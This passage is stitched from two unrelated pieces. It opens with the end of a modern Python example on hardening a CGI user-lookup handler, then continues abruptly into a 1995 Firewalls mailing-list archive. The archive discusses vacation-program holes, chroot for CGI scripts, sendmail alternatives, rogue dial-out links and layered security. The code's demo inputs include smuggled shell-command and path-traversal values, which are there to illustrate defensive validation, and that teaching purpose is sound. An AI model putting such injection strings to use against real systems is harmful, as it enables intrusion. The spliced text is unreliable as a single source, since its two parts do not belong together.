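    if len(users) != 1:
        return 400, "exactly one user= parameter required"
    info = lookup_in_process(users[0])
    if info is None:
        return 404, "no such user"
    return 200, info


if __name__ == "__main__":
    for q in ("user=alice", "user=alice%3Bdate", "user=..%2F..%2Fetc", "user=carol"):
        value = parse_qs(q)["user"][0]
        print(q, "->", handle_cgi(q), "shell-significant:", shell_risky_chars(value))
```

The hardened handler never needs to know which characters are dangerous: it accepts the one shape an account name can have and rejects everything else, which is the property a scripting language without an exec primitive gives you for free. `shell_risky_chars` is only there to make visible what the rejected inputs would have done to `lookup_via_shell`.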
From firewalls-owner Thu Sep 14 21:30:16 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA20179 for firewalls-outgoing; Thu, 14 Sep 1995 21:20:31 -0700
Received: from sunthing.sjsinc.com (sunthing.sjsinc.com [140.174.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA20170 for ; Thu, 14 Sep 1995 21:20:27 -0700
Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: VAA25712; Thu, 14 Sep 1995 21:18:38 -0700
Date: Thu, 14 Sep 1995 21:18:38 -0700
From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
Message-Id: <199509150418.VAA25712@sjsinc.com>
To: firewalls@greatcircle.com
Subject: Any known security holes in the "vacation" program
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Folks:

I'm trying to set up an auto-responder for a couple of mail aliases on my mailhost. For the moment, because I don't really want to get involved with majordomo or any of the other mail list programs, I am using the simple functionality of the "/usr/ucb/vacation" program under SunOS 4.1.x.

Given that the .forward file requires a pipe to this program, what are the possible security implications for this setup (i.e., are there any "well known" holes in this program)???

BTW: I have already hard-coded a subject: line in the vacation.msg file and do not, and will not, put any of the variable substitutions in it. I have also shut down access to the "mailbots" home directory by any other user, other than root of course.

Is there anything else I'm missing???

Regards, b c++'ing u, %-)

sjs

-------------------------------------------------------------------------------
Stefan Jon Silverman - President
SJS Associates, N.A., Inc.
572 Chestnut Street
Distributed Systems Architecture & Implementation
San Francisco, Ca. 94133
Phone: 415 989 2741   Fax: 415 989 7250
E-mail: sjs@sjsinc.com   Cell: 415 519 3494
-------------------------------------------------------------------------------
Weebles wobble, but they don't fall down!!!
-------------------------------------------------------------------------------

From firewalls-owner Thu Sep 14 22:30:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA21876 for firewalls-outgoing; Thu, 14 Sep 1995 22:03:26 -0700
Received: from netmail2.microsoft.com (netmail2.microsoft.com [131.107.1.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA21869 for ; Thu, 14 Sep 1995 22:03:23 -0700
Received: by netmail2.microsoft.com (5.65/25-eef) id AA29051; Thu, 14 Sep 95 22:57:38 -0700
Message-Id: <9509150557.AA29051@netmail2.microsoft.com>
Received: by netmail2 using fxenixd 1.0 Thu, 14 Sep 95 22:57:38 PDT
X-Received: from PRX-01-HUB by nax-01-hub with recvsmtp ; Fri, 15 Sep 1995 05:01:40 GMT
X-Received: from syd-02-msg by prx-01-hub with receive; Fri, 15 Sep 1995 05:01:01 GMT
X-Msmail-Message-Id: 5AA0A8CE
X-Msmail-Conversation-Id: 5AA0A8CE
From: Jonathon Tidswell
To: firewalls@greatcircle.com, R@lce.org
Date: Fri, 15 Sep 95 14:56:29 TZ
Subject: WinNT /Win95 ping/tracert (was RE: source routing)
X-Msxmtid: syd-02-msg950915040111MTP[01.00.00]000000a1-15801
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Windows NT:
trying help ping or help tracert
tracert returned nothing.
However the online help (winnt.hlp) had entries that elaborated a bit on the help available with ping -? or tracert -?

-JonT
Disclaim ...

----------
| From:
|
| Sorry about the changed subject line but I had already deleted a
| short thread earlier, someone was asking for a program that could
| produce source routed packets to use in testing against a firewall.
| While looking around windows 95 I found that traceroute (tracert.exe)
| and ping (ping.exe) both claim in their usage blurb to be able to do
| loose source routing, ping also claims strict source routing. The
| programs aren't in the on-line help and are barely mentioned in the
| very thick and so far useless book with the resource kit. My guess is
| these came out of windows nt and would presumably be documented
| there. Anyone know?
|
| Ramon
|
|
|

From firewalls-owner Thu Sep 14 23:30:12 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA23513 for firewalls-outgoing; Thu, 14 Sep 1995 23:03:36 -0700
Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA23506 for ; Thu, 14 Sep 1995 23:03:29 -0700
Received: (from root@localhost) by yarrina.connect.com.au with UUCP id QAA14248 (8.6.12/IDA-1.6); Fri, 15 Sep 1995 16:01:27 +1000
Received: by junkers.lochard.com.au id AA41538 (5.65c/IDA-1.5); Fri, 15 Sep 1995 15:48:08 +1100
From: Mark
Message-Id: <199509150448.AA41538@junkers.lochard.com.au>
Subject: Re: wank worm
To: frankw@in.net (Frank Willoughby)
Date: Fri, 15 Sep 1995 15:48:07 +1000 (E )
Cc: proff@suburbia.net, firewalls@GreatCircle.COM
In-Reply-To: <9509112305.AA27141@su1.in.net> from "Frank Willoughby" at Sep 11, 95 07:05:23 pm
Content-Type: text
Content-Length: 222
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I doubt you want this particular fortune file for your program as the
>messages generated by the fortune cookie in the wank worm were obscene
>& vulgar.

This is Proff we're discussing here.. :)

Mark
mark@lochard.com.au

From firewalls-owner Fri Sep 15 05:30:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA29533 for firewalls-outgoing; Fri, 15 Sep 1995 05:25:09 -0700
Received: from door.netcs.com (door.netcs.com [194.120.74.246]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA29513 for ; Fri, 15 Sep 1995 05:25:02 -0700
Received: from keks.netcs.com [138.199.0.101] by door.netcs.com with SMTP (8.6.10/25-eef) id OAA13258; Fri, 15 Sep 1995 14:23:36 +0200
Received: by keks.netcs.com (5.67a8+/1.2-eef) id AA24804; Fri, 15 Sep 1995 14:23:35 +0200
Message-Id: <199509151223.AA24804@keks.netcs.com>
Subject: Japanese firm
To: firewalls@greatcircle.com
Date: Fri, 15 Sep 1995 14:23:34 +0200 (MEST)
From: Oliver Korfmacher
X-Mailer: ELM [version 2.4 PL21]
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Content-Length: 124
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anybody know anything about that Japanese firm which has been shaking the Internet recently by sending mail to anybody?
Oliver

From firewalls-owner Fri Sep 15 06:32:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01320 for firewalls-outgoing; Fri, 15 Sep 1995 06:16:35 -0700
Received: from linda.fdata.se (linda.fdata.se [159.72.248.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA01301 for ; Fri, 15 Sep 1995 06:15:45 -0700
Received: from WMX.WMDATA.SE (wmx.wmdata.se [164.9.179.100]) by linda.fdata.se (8.6.12/8.6.9) with SMTP id PAA05266 for ; Fri, 15 Sep 1995 15:11:28 +0200
X400-Received: by /PRMD=WMDATAWMX/ADMD=WMDATA/C=SE/; Relayed; Fri, 15 Sep 1995 12:22:11 +0100
Date: Fri, 15 Sep 1995 12:22:11 +0100
X400-Originator: Roberto.Piludu@STO4.wmdata.se
X400-Recipients: firewalls@greatcircle.com
X400-MTS-Identifier: [/PRMD=WMDATA/ADMD=WMDATA/C=SE/;0012400001536838000002]
X400-Content-Type: P2-1988 (22)
Content-Identifier: CSI NC V3.0
From: "Piludu, Roberto"
Message-ID: <0004A8EE.MAI*/S=WMROPIL/OU=STO4/OU=WMDATA/O=MSMAIL/PRMD=WMDATA/ADMD=WMDATA/C=SE/@MHS>
To: "'Firewalls'"
Subject: alt. mailsystems
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

we're looking for an alternative to Sendmail. We have a SUN sparc20 on the outside of our firewall, and we want to be able to send mail directly to the SUN, and then from there to the firewall. I've read about smap - is it a good alternative to sendmail in this configuration? Any other products that come to your minds?
TIA
Roberto Piludu
WM-data Communication

From firewalls-owner Fri Sep 15 06:50:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01960 for firewalls-outgoing; Fri, 15 Sep 1995 06:32:30 -0700
Received: from novell.com (nj-ums.fpk.novell.com [147.2.128.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA01953 for ; Fri, 15 Sep 1995 06:32:26 -0700
From: cjc@novell.com
To: firewalls@GreatCircle.COM
Date: Fri, 15 Sep 1995 09:09 EDT
Received: from summit by UMS-hub.novell.com; Fri, 15 Sep 95 09:27 EDT
Subject: Re: Rogue Internet connection
Content-Length: 4728
Content-Type: text/plain
Message-ID: <30597fa10.3c35@chimaera.summit.novell.com>
Original-Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We have a similar dial-out setup here where you can connect to the outside through a central modem-pool (with appropriate software to make it look like a local modem for PC's and for Unix workstations). The way we handle this problem is as follows:

1) There's a well articulated corporate-wide policy against connecting to outside networks unless the connection is designed/installed/administered by the appropriate IS&T network security folks. This is perhaps the most important part.

2) There's another well articulated policy that you can't get _any_ modem connection without clearing it through the IS&T security folks, and you're not allowed to use it for something other than what it's approved for (like connecting to the Internet over PPP). Audits are done on this (sometimes).

3) Here in Florham Park, all our computer-center servers can connect through the outbound modem pool, but only for simple "cu" type sessions.

4) For people wishing to connect outbound through the modem pool from their PC's or Unix workstations, see # 2.
Yes, there definitely are ways to get around this, but at least there's a pretty good audit trail and a definite set of policies saying something to the effect that if you're bad we'll fire you, burn your house, kill your dog, video tape the whole thing, and show it to all your fellow employees as a reminder.

Also, we already have (secure) T1 connections to the Internet in each of our major US sites (and other connections sprinkled throughout the world, too), so it's not like folks need to go behind our back just to surf their favorite WWW site or something.

--
Christopher J. Calabrese
Network Security Architect
Novell Information Services & Technology, Florham Park, NJ
cjc@novell.com

> DATE: Thu Sep 14, 1995 4:21 pm
> SUBJECT:Research WWW
>
> Until recently I was under the impression that our organization did
> not have Internet access. I recently discovered that one
> department has established a home grown network link. Forget about
> security policies. That won't happen until we crash and burn.
> Please evaluate this scenario for me. What are our risks? If the
> responses are appropriate for the list, please email directly.
>
>
> A PC was configured to serve modems to the local area
> network for dial-out service only, using software from
> Synergy Solutions called Modem Assist Plus. This software,
> which consists of both a client and server portion allows
> for transparent PC communications(COM) port redirection. It
> does this by capturing all data intended for the PC's COM
> port and bundling it into Netbios messages and sending them
> to the Server PC. This data is then unpacked and sent to one
> of the attached modems. The server in turn bundles any data
> it receives into Netbios messages and sends the data back to
> the client. This permits any PC based communication program
> to transparently access the modems on the Modem Server.
> Requests for modems are queued by the server and users are
> notified of the availability of a modem so that they can
> either wait in the queue or try to access a modem later. The
> client portion of the software is Windows based so that DOS
> conventional memory requirements are not a factor.
>
> Access to the internet is provided through CompuServe Inc.'s
> PPP/SLIP access using their WINSOCK.DLL. This WINSOCK is
> pre-configured to work properly with CompuServe's PPP/SLIP
> servers. All users access the same PPP/SLIP account.
>
> The modems and server are accessible from 6 A.M. to 6 P.M.
> Monday through Friday. The server and modems are on a timer
> that cuts the power at all other times. This was done to
> dissuade users from abusing the service.
>
> Currently the system will support four simultaneous
> connections. We have purchased a 50 seat network license to
> use Netscape Navigator for accessing the World Wide Web,
> newsgroups, ftp sites, and email.
>
>
> TIA
>
> Henry Lemon                 Opinions expressed are mine
> Aristech Chemical Corp.     and not those of my employer
> 600 Grant St.
> Room 930
> Pittsburgh PA 15201
> LEMONH%A1%Aristech_Chemical_Corporation@mcimail.com

From firewalls-owner Fri Sep 15 07:00:29 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02542 for firewalls-outgoing; Fri, 15 Sep 1995 06:49:41 -0700
Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA02535 for ; Fri, 15 Sep 1995 06:49:30 -0700
From: Chris Tyler
To: firewalls@greatcircle.com
Date: Fri, 15 Sep 1995 09:48 EDT
Subject: Re: ACLs (was Firewall off Mortal Kombat XIV)
Content-Length: 1210
Content-Type: text/plain
Message-ID: <3059842e0.237f@devel.dejong.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Digressing slightly from firewalling...

Peter da Silva writes...
> I'm not convinced that ACLs enhance security.
> They make some things easier,
> but they can also confuse the hell out of users. Confused users tend to do
> dumb things.

The SVR4ES ACLs (also in SVR4.2MP aka UnixWare 2.0X) work very nicely in that the ACL and mode bits work together (i.e., looking at "ls -l" will give you a fair idea of what the access settings are on a file; u is u, g is maximum for anyone else, and o is minimum accessibility). The ACL commands are klunky, though.

However... I still have trouble getting some users to understand mode bits on their WordPerfect files >:-()

I think the most elegant ACL system was the one used in the later versions of Multics, which displayed access permissions about as plainly as they could be shown (--> fewer confused users) and had great granularity.

I also like the privilege and tfadmin portions of SVR4.2MP, which permit specific admin tasks to be delegated to users without giving away full-blown root access.

But back to firewalling...

Chris Tyler                           chris@dejong.com
Systems Development Manager, Wm. De Jong Enterprises Inc.
+1-519-424-9007 / fax +1-519-424-2399

From firewalls-owner Fri Sep 15 07:02:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02951 for firewalls-outgoing; Fri, 15 Sep 1995 06:59:23 -0700
Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA02943 for ; Fri, 15 Sep 1995 06:59:11 -0700
Received: by mail.swip.net with UUCP (8.6.8/3.01) id QAA14239; Fri, 15 Sep 1995 16:04:15 +0200
Received: by sendpost with UUCP/PMDF (DECUS UUCP); Fri, 15 Sep 1995 16:01:08 +0100
Received: from SEB008 by seb022 (PMDF V4.3-7 #10220) id <01HVB77IGGB4001UH1@seb022>; Fri, 15 Sep 1995 16:00:55 +0100
Received: by seb008.sebank.se (MX V4.0 VAX) id 15; Fri, 15 Sep 1995 15:54:52 +0100
Date: Fri, 15 Sep 1995 15:54:52 +0100
From: kahar@sebank.se
Subject: IBM NetSP
To: firewalls@greatcircle.com
Cc: kahar@sebank.se
Reply-to: kahar@sebank.se
Message-id: <0099670C.0F022E40.15@seb008.sebank.se>
X-Envelope-to: seunet!greatcircle.com!firewalls
MIME-version: 1.0
Content-type: TEXT/PLAIN; CHARSET=US-ASCII
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm looking for comments and experiences with IBM's NetSP, Secured Network Gateway version 1.2. How does it compare to other products like BorderWare and FireWall-1?
Katarina Harcus
SEB DATA

From firewalls-owner Fri Sep 15 07:33:11 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03352 for firewalls-outgoing; Fri, 15 Sep 1995 07:03:45 -0700
Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA03345 for ; Fri, 15 Sep 1995 07:03:42 -0700
From: long-morrow@CS.YALE.EDU
Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.6.12/res.host.cf-4.0) with ESMTP id KAA26053; Fri, 15 Sep 1995 10:00:51 -0400
Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.6.12/res.client.cf-4.0) id KAA20314; Fri, 15 Sep 1995 10:00:49 -0400
Date: Fri, 15 Sep 1995 10:00:49 -0400
Message-Id: <199509151400.KAA20314@SPARKY.CF.CS.YALE.EDU>
To: cosborn@bbn.com, jst10@octacon.co.uk
Subject: Re: WWW - http - cgi_scripts
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Also, consider running your httpd chroot()d so that the CGI scripts have to run in this virtual "jail" as well. It can be a pain (you have to make sure that anything that CGI programs need -- shared libraries, perl interpreter and library modules -- exists within the chroot()d hierarchy), but it should help to contain a CGI program gone haywire (or one that an external WWW user attempted to trick and hijack). We run a number of CGI programs in a chroot()d environment.
- Morrow

From firewalls-owner Fri Sep 15 07:33:15 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04287 for firewalls-outgoing; Fri, 15 Sep 1995 07:26:07 -0700
Received: from mail.ucsd.edu (ucsd.edu [132.239.254.201]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA04278 for ; Fri, 15 Sep 1995 07:26:03 -0700
Received: from juju.adnc.com by mail.ucsd.edu; id HAA25087 sendmail 8.6.12/UCSD-2.2-sun via SMTP Fri, 15 Sep 1995 07:24:40 -0700
Message-Id: <199509151424.HAA25087@mail.ucsd.edu>
X-Sender: dschiffrin@popmail.ucsd.edu (Unverified)
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 15 Sep 1995 07:35:01 -0700
To: frankw@in.net (Frank Willoughby)
From: David Schiffrin
Subject: RE: Xyplex
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Umm dave who?

At 04:22 PM 9/13/95 -0400, Frank Willoughby wrote:
>Dave,
>
>My mail to you bounced. Your gateway didn't like the address you
>supplied. E-mail me & I'll reply.
>
>Best Regards,
>
>
>Frank
>
>
>
--------------------------------------------------------------------------------
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em 'cause she comes back." --B.B. King

David Schiffrin
dschiffrin@ucsd.edu

Please note address change....NOT daves@ucsdext.ucsd.edu, NOT dschiff@ramapo.edu NOT daves@sd.microage.com and NOT daves@excalib.com and also NOT elvis@*.* OR for that matter daves@elvis*

From firewalls-owner Fri Sep 15 07:34:15 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03182 for firewalls-outgoing; Fri, 15 Sep 1995 07:01:59 -0700
Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA03152 for ; Fri, 15 Sep 1995 07:01:51 -0700
Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA18920; Fri, 15 Sep 1995 08:58:05 -0400
Date: Fri, 15 Sep 1995 08:58:05 -0400
From: Ted Doty
Message-Id: <199509151258.IAA18920@kgbvax.network.com>
To: smith@sctc.com, firewalls@greatcircle.com
Subject: Re: Firewall off Mortal Kombat XIV
In-Reply-To: Mail from 'Rick Smith ' dated: Thu, 14 Sep 1995 11:49:14 -0500
Cc: smith@sctc.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I apologize in advance for a somewhat lengthy posting.

Rick Smith writes:
>
> Ted Doty writes:
>
> >developers, then The Right Thing To Do is to put general security hooks in
> >the kernel.
>
> Put not your faith in silver bullets, and certainly not in general
> security hooks in a kernel. To be useful, the kernel would have to
> anticipate everything about every application and provide a direct and
> simple way to represent the security policy any application might ever
> need.

Putting faith in silver bullets makes you an instant Security Pinhead. However, this is a different thing. If you're trying to make an impermeable security barrier for your organization, then you've set yourself quite a challenge. ;-) If, on the other hand, you are trying to establish a reasonably robust set of protections that will keep out all but the uebercrackers, then you can make a really good start with this approach.
The fundamental assumptions of this are:

1. Applications are, and will remain, buggy (in unanticipated and probably impossible to anticipate ways).

2. We're stuck with our old applications, and attempts to forbid their use will cause user rebellion, either overt (getting your butt fired, Mr/Ms Security Weenie) or covert (dial-up PPP).

3. What we're most concerned about is preventing anonymity, because if we can do a decent identification of friend or foe, we remove much of the "hard stuff" from our firewall.

4. Anonymity can only be prevented with good authentication, which means crypto. Fortunately, there's a standards-based approach that looks like it will bear fruit, so we don't have to be stuck with vendor foo's proprietary crypto solution [don't get me wrong ... I'd LOVE it if everyone rushed out and bought up NSC's DPF. Works Great, Lasts A Long Time. But now, back to reality]. This is not a magic bullet, just a tool to prevent anonymity from arbitrary Internet locations.

5. Access control is most of what remains (at least of what is easy to do). Again, there are widely-deployed, public-domain solutions (like TCP Wrappers) that everyone can get their hands on. Set them up to allow only particular access from external sources, and you handle most applications other than sendmail [I'm about ready to throw up my hands on sendmail ...]. Again, no magic bullet here, simply the prudent use of available tools.

6. Double check everything. Audit trails are your friend, and there are lots of ways to collect them (and even analyze them!). This will tell you when something breaks (which it will). You can compare audit logs from hosts with logs of what's crossed the net, so it becomes doubly hard for an attacker to cover his/her tracks. Again, no silver bullet, just the prudent use of 1970s technology. ;-)

7. You're never secure. There is no magic box that will protect you, and even the protections listed here probably won't.
What they should do is tell you when you've been had, so you can take appropriate action (like blocking the latest new hacker attack or firing the guy in engineering that keeps hacking into the accounts receivable database).

> Ergo, a bad enough mistake in the application will still yield a
> vulnerability regardless of how tough the kernel is. You have to

You have to expect that the software on your workstation (both kernel and application) will remain basically wretched, from a security point of view. The issue then, is: how to mitigate this? I still maintain that it's a much more effective use of vendors' development time and system administrators' time to implement as much as possible in the kernel, rather than trying to do a "Security-Enhanced Foo Protocol".

> balance responsibility for security between the application and the
> kernel. Neither can do the job alone. A boneheaded developer can
> implement an application with security holes just as effectively on a
> highly secure platform as on a DOS PC.

Or keep out the outsiders, and trust that the insiders won't mess with you too often, but audit the access to make sure that they don't.

Look, I'd LOVE to have application developers spend real brain-sweat on security, but even if they did, you're still stuck with holes in libc (all right ... who out there has actually gone through all the library routines?).

Somewhat getting back to (what I think was) Marcus' original point, we probably CAN'T implement what we've all been considering to be "real security". The question then is, how do we keep the Bad Guys from stealing us blind?

--
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation     | phone: +1 301 596-2270
8965 Guilford Road, Suite 250             | fax: +1 410 381-3320
Columbia, MD, 21046 USA                   | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Fri Sep 15 08:03:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03898 for firewalls-outgoing; Fri, 15 Sep 1995 07:18:46 -0700
Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA03891 for ; Fri, 15 Sep 1995 07:18:42 -0700
Received: from vodka.sse.att.com by ig1.att.att.com id AA21287; Fri, 15 Sep 95 10:15:12 EDT
Message-Id: <9509151415.AA21287@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: Secure version of Sendmail
To: jeremyp@gsms01.alcatel.com.au (Peter Jeremy)
Date: Fri, 15 Sep 1995 10:11:32 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199509142155.HAA22775@gsms01.alcatel.oz.au> from "Peter Jeremy" at Sep 15, 95 07:55:53 am
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Peter,

> > Rick writes:
> > The purpose of nonbypassable
> >access control mechanisms like Type Enforcement is to prevent the
> >inevitable bugs from allowing instant and complete compromise of the
> >system.
> What if the bugs are in the Type Enforcement code?
>
> I agree that running Sendmail V8 on a B1 OS (or something similar) is
> more secure than . But it
> does not guarantee that there isn't a gaping hole in the OS which lets you
> obtain sufficient access to wipe the audit trails and bypass the
> compartmentalisation (does such a word exist?).
>

I'm content with "more secure", and make no claims of an absolutely secure OS. Forcing the intruder to have a sendmail bug *AND* an OS bug in the "hardened" OS makes him/her work harder/longer, and gives us more time to discover the attack. Plus "hardened" OS's have more tools available with which to detect the attack.
Mark Riggins Secure Systems Engineering AT&T Bell Labs

From firewalls-owner Fri Sep 15 08:05:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03541 for firewalls-outgoing; Fri, 15 Sep 1995 07:09:06 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA03534 for ; Fri, 15 Sep 1995 07:09:01 -0700 Received: from vodka.sse.att.com by ig1.att.att.com id AA16148; Fri, 15 Sep 95 10:04:53 EDT Message-Id: <9509151404.AA16148@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Mulitple levels of security (was Secure version of sendmail) To: peter@nmti.com (Peter da Silva) Date: Fri, 15 Sep 1995 10:01:24 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509150138.AA18846@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 14, 95 08:38:40 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Peter de Silva Writes:
>
> The application writers will say "we don't need to check this stuff, the
> OS will do it for us". Don't tell me they won't... I've been porting code...
...
> You'll get some short term security, while you're running apps written for
> C1 under B, but the application writers will get lazy. They always do.

True, applications programmers can get lazy, and even the best ones may not have security in mind. That makes the secure OS *more* valuable not less. Are you trying to imply that they will be lazier because they trust a secure OS more? The lazy ones can't get any worse. If they weren't thinking about security under C1 (no security) they won't bother to think less about it under B level security.

> We need OS security, we need applications security, we need firewalls ...

We need multiple layers of security!
Adding all of the pieces together gives us more security and more time to detect an attack and hopefully prevent it from succeeding. I think that each of the following provides complementary pieces to the puzzle.

1) strong authentication and identification
2) session security (could be encryption either at the link or session level)
3) perimeter LAN security firewalls around the LAN perimeter.
4) application level security:
   -language support for security
   -application level auditing
   -secure databases
5) host security
   -system level auditing
   -compartmentalization of applications
   -protection of user from user
   -protection of application from application
   -protection of underlying OS
   -intrusion detection
6) physical security of plant/property & equipment
7) security training of personnel (essential)

I really don't care how each level is implemented as long as it's effective and supports the overall security goals. For example, there are many ways to strongly authenticate, SKEY/kerberos/smart card etc. Any of these is better than a seldom-changed password found in an English dictionary. I'm sure someone can give you a more comprehensive list than the one above, but if you omit any of those above levels, security starts to unravel. Most of my experience is in levels 3-5, but I realize that no single one of these levels will ever be a complete solution.

Sometimes we all fall prey to the idea that if those application programmers would just start checking buffer lengths and checking their inputs that all these security problems would go away. No they wouldn't. We'd still have session hijacking and the rest of the problems at the other levels. Others seem to think that if we just got our firewalls and encryption right, that we'd have security. That's not true either. If the underlying hosts and PC's etc have security problems, then the holes still exist.
And if the physical plant is not secured and the staff is still programming their password into a function key on the terminal, or taping a list of one-time passwords to the side of the monitor, then we're still not secure.

Mark Riggins Secure Systems Engineering AT&T Bell Labs

PS: If you see another "level" that I'm missing in the above 7 levels, please chip in.

From firewalls-owner Fri Sep 15 08:06:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05292 for firewalls-outgoing; Fri, 15 Sep 1995 07:55:30 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA05281 for ; Fri, 15 Sep 1995 07:55:25 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id JAA11534; Fri, 15 Sep 1995 09:52:00 -0500 Message-Id: <199509151452.JAA11534@psisa.com> Subject: Re: IBM NetSP To: kahar@sebank.se Date: Fri, 15 Sep 1995 09:51:59 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <0099670C.0F022E40.15@seb008.sebank.se> from "kahar@sebank.se" at Sep 15, 95 03:54:52 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Greetings to Sweden, Katarina :) I used to live in middle Sweden for a while.. anyways :)..

> I'm looking for comments and experiences with IBMs NetSP, Secured Network
> Gateway version 1.2. How does it compare to other products like BorderWare
> and FireWall-1?

I'm working at Advantis/IBM Global Network in White Plains right now, and finishing my last hours here before I go to my new assignment in Boulder, CO. I've been building scalable, load-balanced, fault-tolerant firewalls based on NetSP SNG 1.2 here, in an effort to 'cope' with the amount of traffic from 70,000-100,00 users, which one machine obviously can't handle.
Let me know what exactly you need to know about NetSP SNG even though you might not need this kind of particular 'enhancement'.. I guess, I know this product pretty well by now. :)

Best Regards, Chris

--___ ____ __ | _ \/ __/| \ Christian Kuhtz "And dsmit hailed: | _/\__ \| \ \ Pencom Systems Administration Services We shall smit thou |_| /___/|_|__\ on-site at IBM, Gov't Services, Boulder, CO forever!"

From firewalls-owner Fri Sep 15 08:07:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04935 for firewalls-outgoing; Fri, 15 Sep 1995 07:44:50 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA04923 for ; Fri, 15 Sep 1995 07:44:44 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA08264; Fri, 15 Sep 95 10:45:15 EDT Date: Fri, 15 Sep 1995 10:45:13 -0400 (EDT) From: Scott Barman To: "william.wells" Cc: firewalls Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: <9509141817.AA20648@damark.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Thu, 14 Sep 1995, william.wells wrote:

